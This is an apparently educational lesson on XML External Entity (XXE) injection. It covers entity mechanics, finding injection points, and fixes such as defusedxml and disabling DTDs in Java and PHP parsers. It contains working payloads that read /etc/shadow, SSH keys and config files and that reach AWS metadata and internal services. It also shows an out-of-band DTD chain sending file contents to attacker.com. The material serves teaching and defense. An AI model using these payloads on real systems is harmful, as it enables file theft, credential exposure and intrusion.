XML External Entities (XXE)
Abusing XML parsers to read local files, perform SSRF, and exfiltrate data out-of-band.
XML is everywhere you do not expect it: SOAP web services, document upload features, SVG files, DOCX and XLSX files (which are ZIP archives containing XML), RSS feeds, configuration parsers, and API endpoints that accept both JSON and XML. Whenever an XML parser processes a document with external entity references enabled, the parser will go and fetch those references - from the local filesystem, from internal network URLs, or from attacker-controlled servers. This is XML External Entity injection (XXE), and it has been used to read /etc/passwd, expose AWS credentials, and trigger full SSRF from document parsers in otherwise well-secured applications.
Authorized Testing Only
XXE attacks can read arbitrary files from the server's filesystem (including private keys, credentials, and source code), perform internal network requests, and in some configurations achieve remote code execution. Only test XXE on systems you own or have explicit written authorization to test. Using XXE to exfiltrate data from a production system without permission is a serious crime under the CFAA and equivalent laws.
The XML External Entity Mechanism
XML supports a feature called a Document Type Definition (DTD), which can declare entities - essentially named constants that can be substituted into the XML document body. There are two kinds that matter for XXE:
Internal entity (harmless):
<!DOCTYPE foo [
<!ENTITY myname "Alice">
]>
<root>Hello, &myname;!</root>The parser substitutes &myname; with "Alice". Completely benign.
External entity (the dangerous kind):
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>The SYSTEM keyword tells the parser to fetch the entity's value from an external resource. When the application returns the parsed XML or reflects the content of any element, the contents of /etc/passwd appear in the response. This is the entirety of the XXE read primitive.
Reading Local Files
The most immediate impact of XXE is arbitrary file read from the server's filesystem.
Basic Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>If the application includes the value of data in its response, you receive /etc/passwd.
Common high-value files to target:
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///etc/hosts">
<!ENTITY xxe SYSTEM "file:///proc/self/environ">
<!ENTITY xxe SYSTEM "file:///proc/self/cmdline">
<!ENTITY xxe SYSTEM "file:///home/www-data/.ssh/id_rsa">
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
<!ENTITY xxe SYSTEM "file:///app/config/database.yml">
<!ENTITY xxe SYSTEM "file:///etc/nginx/nginx.conf">On Windows targets:
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY xxe SYSTEM "file:///C:/inetpub/wwwroot/web.config">Reading PHP Source Code
file:// on PHP files returns the raw PHP code - no execution, just the source. This reveals database passwords, internal API keys, and other secrets embedded in the application:
<!ENTITY xxe SYSTEM "file:///var/www/html/includes/db.php">You can also use the PHP filter wrapper to base64-encode the file content (useful when the file contains characters that break XML parsing):
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">Decode the base64 output to get the file content.
When file:// Breaks on Special Characters
Files containing XML-reserved characters (less-than, ampersand, double quotes) will cause the XML parser to error. Use the PHP filter or wrap content in CDATA: in your DTD, declare an entity that expands to the CDATA delimiter and surround the file entity reference with it. This is the standard technique for reading arbitrary binary-safe file content via XXE.
SSRF via XXE
External entities can use http:// and https:// instead of file://, turning XXE into a full SSRF primitive. The parser fetches the URL on the server's behalf.
Internal Service Enumeration
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://localhost:6379/">
]>
<root><data>&xxe;</data></root>If the response includes Redis banner text, the internal Redis is confirmed. This gives you the same internal-network access described in the SSRF lesson.
AWS Cloud Metadata via XXE
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>The parser fetches the AWS IMDS endpoint and returns the IAM role name. A second request fetches the credentials. This is the same cloud metadata attack as SSRF, triggered via XXE instead of a URL-fetch feature.
Combining XXE and SSRF: Internal API Access
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://internal-api.corp/admin/users">
]>
<root><data>&xxe;</data></root>The server-side XML parser makes the request with the server's internal network identity, bypassing any firewall rules that block your IP.
Finding XXE Injection Points
XXE requires the application to:
- Accept XML input (or input that gets converted to XML internally)
- Parse that XML with an XML parser
- Either reflect parsed content OR make out-of-band requests
Hunt for:
- Direct XML endpoints: SOAP/WSDL services, XML APIs, AJAX requests with
Content-Type: application/xmlortext/xml - File upload features: DOCX, XLSX, ODT, SVG, PDF with embedded XML
- Content-Type switching: change
application/jsontoapplication/xmland reformat the body as XML - some frameworks accept both - Serialization endpoints: Java applications using JAXB, .NET with XmlSerializer, Python's
xml.etreeorlxml
In Burp Suite, right-click any request - "Change request method" and "Change body to XML" are useful quick tests. The Content-Type header scanner in Burp Active Scan will flag XML endpoints.
Blind / Out-of-Band XXE Exfiltration
Often the application processes your XML but does not echo the entity content back in the response. This is blind XXE. Detection and exfiltration require out-of-band techniques.
Step 1: Confirm OOB Connectivity
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://your-collaborator.burpcollaborator.net/">
]>
<root><data>&xxe;</data></root>If your Collaborator console receives a DNS lookup or HTTP request, the parser is resolving external entities.
Step 2: Exfiltrate Via External DTD
For data exfiltration from blind XXE, you need a two-step DTD trick. Host an external DTD file on your server (e.g., http://attacker.com/xxe.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;Then your payload references the external DTD:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/xxe.dtd">
%dtd;
]>
<foo/>When the parser processes this:
- It fetches your external DTD.
- The DTD reads
/etc/passwdinto%file. - The DTD builds a second entity that makes an HTTP request to your server with the file content as a query parameter.
- Your server receives the file content in the incoming request URL.
This chain works because parameter entities (%name;) can be used inside DTD declarations in ways that regular entities cannot.
OOB Exfiltration Limitations
The external DTD approach does not work when the file content contains certain characters (newlines, ampersands, less-than signs) that break the URL or the entity reference. The PHP filter base64-encode wrapper (php://filter/convert.base64-encode/resource=...) is the standard workaround: the file is base64-encoded before being embedded in the URL, so no special characters remain.
Step 3: Error-Based Exfiltration
Some parsers emit verbose error messages. If you can trigger a parse error that includes the file content, you get exfiltration through the error channel without needing an OOB connection. The technique involves declaring an entity that references a non-existent URI containing the file data:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;The parser tries to open file:///nonexistent/[contents of /etc/passwd], fails, and throws an error message that includes the path - which contains the file contents.
XXE in Less Obvious Places
SVG File Uploads
SVG is XML. A crafted SVG can contain an XXE payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>Upload this SVG to a platform that processes or renders SVG files server-side (e.g., converting to PNG, extracting text, rendering thumbnails). If the SVG parser has external entity processing enabled, the text element contains /etc/passwd when rendered.
DOCX / XLSX Files
Office Open XML (.docx, .xlsx) files are ZIP archives containing XML files. Replace word/document.xml with an XXE payload, re-zip, and upload. If the application parses the document XML, it processes the entity.
SAML Authentication Assertions
SAML (Security Assertion Markup Language) uses signed XML documents for SSO. Some SAML parsers process external entities before validating signatures - meaning an unsigned XXE payload can be injected into a SAML request and parsed before the signature check happens.
Prevention
1. Disable External Entity Processing (Primary Fix)
Every XML parser library has a way to disable external entities. This should be your first configuration step any time you use an XML parser.
Python (lxml):
from lxml import etree
# SECURE: disable external entities and DTD loading
parser = etree.XMLParser(
no_network=True,
resolve_entities=False,
dtd_validation=False,
load_dtd=False
)
tree = etree.fromstring(xml_data, parser)Python (defusedxml - the easy option):
import defusedxml.ElementTree as ET
# defusedxml raises on any XXE attempt by default
tree = ET.fromstring(xml_data)Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);PHP (libxml):
libxml_disable_entity_loader(true); // PHP < 8.0
// PHP 8.0+: LIBXML_NOENT flag removed from default, external entities disabled
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);Use defusedxml in Python
The defusedxml package wraps Python's standard XML libraries with secure defaults - it raises DTDForbidden, EntitiesForbidden, and ExternalReferenceForbidden exceptions by default. It is a drop-in replacement for xml.etree.ElementTree that makes XXE impossible without any per-parser configuration.
2. Avoid DTD Processing Entirely
If your application does not use DTDs, disable DTD loading entirely. This is a stronger control than just disabling external entities - it blocks the entire entity declaration mechanism.
3. Use a Modern Serialization Format
If you control the interface, prefer JSON over XML for API design. JSON has no entity mechanism, no DTD, and no external reference capability. This eliminates the XXE surface entirely.
4. Input Validation (Defense in Depth)
Reject input that contains <!DOCTYPE or <!ENTITY declarations if your application does not require DTDs. A simple pre-parse string check will catch most off-the-shelf XXE payloads:
def validate_no_dtd(xml_string: str) -> None:
if '<!DOCTYPE' in xml_string or '<!ENTITY' in xml_string:
raise ValueError("DTD/Entity declarations are not permitted")This is defense-in-depth, not a replacement for disabling external entities in the parser itself.
5. Patch XML Parser Libraries
Parser libraries have had bugs where XXE features were enabled by default or where security configurations could be bypassed. Keep all XML parsing libraries current.
Key Takeaways
- XXE exploits the XML external entity mechanism to have the server fetch content from
file://,http://, orhttps://URIs declared in the XML DTD. - The primary impacts are arbitrary local file read (credentials, private keys, source code), SSRF to internal services, and cloud metadata exfiltration.
- Blind XXE is confirmed via out-of-band DNS/HTTP callbacks and exfiltrated using external DTD parameter entity chains or error-based techniques.
- XXE lurks in SVG uploads, DOCX/XLSX parsers, SAML assertions, and any XML API endpoint.
- Fix: disable external entity processing and DTD loading in the XML parser - use
defusedxmlin Python, explicitsetFeaturecalls in Java, and prefer JSON over XML for new interfaces.